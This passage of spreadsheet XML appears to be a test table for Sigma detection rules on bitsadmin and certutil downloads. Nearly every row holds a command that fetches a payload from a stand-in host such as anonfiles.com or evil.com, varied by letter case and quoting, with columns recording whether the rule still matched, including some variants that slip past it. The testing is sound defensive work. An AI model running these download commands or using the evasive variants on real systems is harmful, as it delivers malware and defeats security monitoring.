          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1700" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1700" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1700" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1700" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1700" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1700" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1700" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1701" ht="15.75" customHeight="1" s="42">
      <c r="A1701" s="43" t="n"/>
      <c r="B1701" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1701" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1701" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1701" s="43" t="inlineStr">
        <is>
          <t>certutil -UrlCache /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1701" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1701" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1701" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1701" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1701" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1702" ht="15.75" customHeight="1" s="42">
      <c r="A1702" s="43" t="n"/>
      <c r="B1702" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1702" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1702" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1702" s="36" t="inlineStr">
        <is>
          <t>certutil -URLCaCHE -split -F https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1702" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1702" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1702" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1702" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1702" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1702" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1703" ht="15.75" customHeight="1" s="42">
      <c r="A1703" s="43" t="n"/>
      <c r="B1703" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1703" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1703" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1703" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split /"f" https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1703" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1703" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1703" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1703" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1703" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1703" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1704" ht="15.75" customHeight="1" s="42">
      <c r="A1704" s="43" t="n"/>
      <c r="B1704" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1704" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1704" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1704" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCAChE -split -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1704" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1704" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1704" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1704" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1704" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1704" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1705" ht="15.75" customHeight="1" s="42">
      <c r="A1705" s="43" t="n"/>
      <c r="B1705" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1705" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1705" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1705" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -SplIt -"f" https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1705" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1705" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1705" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1705" s="36" t="n"/>
      <c r="J1705" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1705" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1706" ht="15.75" customHeight="1" s="42">
      <c r="A1706" s="43" t="n"/>
      <c r="B1706" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1706" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1706" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1706" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCAcHE -split -F https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1706" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1706" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1706" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1706" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1706" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1706" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1707" ht="15.75" customHeight="1" s="42">
      <c r="A1707" s="43" t="n"/>
      <c r="B1707" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1707" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1707" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1707" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1707" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1707" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1707" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1707" s="43" t="n"/>
      <c r="J1707" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1707" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1708" ht="15.75" customHeight="1" s="42">
      <c r="A1708" s="43" t="n"/>
      <c r="B1708" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1708" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1708" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1708" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1708" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1708" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1708" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1708" s="36" t="n"/>
      <c r="J1708" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1708" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1709" ht="15.75" customHeight="1" s="42">
      <c r="A1709" s="43" t="n"/>
      <c r="B1709" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1709" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1709" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1709" s="36" t="inlineStr">
        <is>
          <t>certutil -uRLCAChe -"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1709" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1709" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1709" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1709" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1709" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1709" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1710" ht="15.75" customHeight="1" s="42">
      <c r="A1710" s="43" t="n"/>
      <c r="B1710" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C1710" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1710" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E1710" s="43" t="inlineStr">
        <is>
          <t>certutil -UrlcACHe /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F1710" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1710" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1710" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1710" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1710" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1711" ht="15.75" customHeight="1" s="42">
      <c r="A1711" s="43" t="n"/>
      <c r="B1711" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1711" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1711" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1711" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1711" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1711" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1711" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1711" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1711" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1712" ht="15.75" customHeight="1" s="42">
      <c r="A1712" s="43" t="n"/>
      <c r="B1712" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1712" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1712" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1712" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob -"download" -"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1712" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1712" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1712" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1712" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1712" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1713" ht="15.75" customHeight="1" s="42">
      <c r="A1713" s="43" t="n"/>
      <c r="B1713" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1713" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1713" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1713" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRansFeR myjob /download /PRioRITY normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1713" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1713" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1713" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1713" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1713" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1713" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1714" ht="15.75" customHeight="1" s="42">
      <c r="A1714" s="43" t="n"/>
      <c r="B1714" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1714" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1714" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1714" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /"download" /PriOrIty normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1714" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1714" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1714" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1714" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1714" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1714" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1715" ht="15.75" customHeight="1" s="42">
      <c r="A1715" s="43" t="n"/>
      <c r="B1715" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1715" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1715" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1715" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TraNSFEr myjob /dowNlOad /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1715" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1715" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1715" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1715" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1715" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1715" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1716" ht="15.75" customHeight="1" s="42">
      <c r="A1716" s="43" t="n"/>
      <c r="B1716" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1716" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1716" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1716" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myjob /"download" /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1716" s="43" t="n"/>
      <c r="J1716" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1716" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1717" ht="15.75" customHeight="1" s="42">
      <c r="A1717" s="43" t="n"/>
      <c r="B1717" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1717" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1717" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1717" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tranSFEr myjob /download /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1717" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1717" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1717" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1717" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1717" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1717" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1718" ht="15.75" customHeight="1" s="42">
      <c r="A1718" s="43" t="n"/>
      <c r="B1718" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1718" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1718" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1718" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download /"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1718" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1718" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1718" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1718" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1718" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1718" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1719" ht="15.75" customHeight="1" s="42">
      <c r="A1719" s="43" t="n"/>
      <c r="B1719" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1719" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1719" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1719" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download -"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1719" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1719" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1719" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1719" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1719" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1719" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1720" ht="15.75" customHeight="1" s="42">
      <c r="A1720" s="43" t="n"/>
      <c r="B1720" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1720" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1720" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1720" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TrAnsfer myjob /downlOAd /PrioriTy normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1720" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1720" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1720" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1720" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1720" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1720" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1721" ht="15.75" customHeight="1" s="42">
      <c r="A1721" s="43" t="n"/>
      <c r="B1721" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1721" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1721" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1721" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /priority high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1721" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1721" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1721" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1721" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1721" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1721" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1722" ht="15.75" customHeight="1" s="42">
      <c r="A1722" s="43" t="n"/>
      <c r="B1722" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1722" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1722" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1722" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /PrIORItY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1722" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1722" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1722" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1722" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1722" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1722" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1723" ht="15.75" customHeight="1" s="42">
      <c r="A1723" s="43" t="n"/>
      <c r="B1723" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1723" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1723" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1723" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /doWnLOaD /pRIoRitY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1723" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1723" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1723" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1723" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1723" s="43" t="n">
        <v>0</v>
      </c>
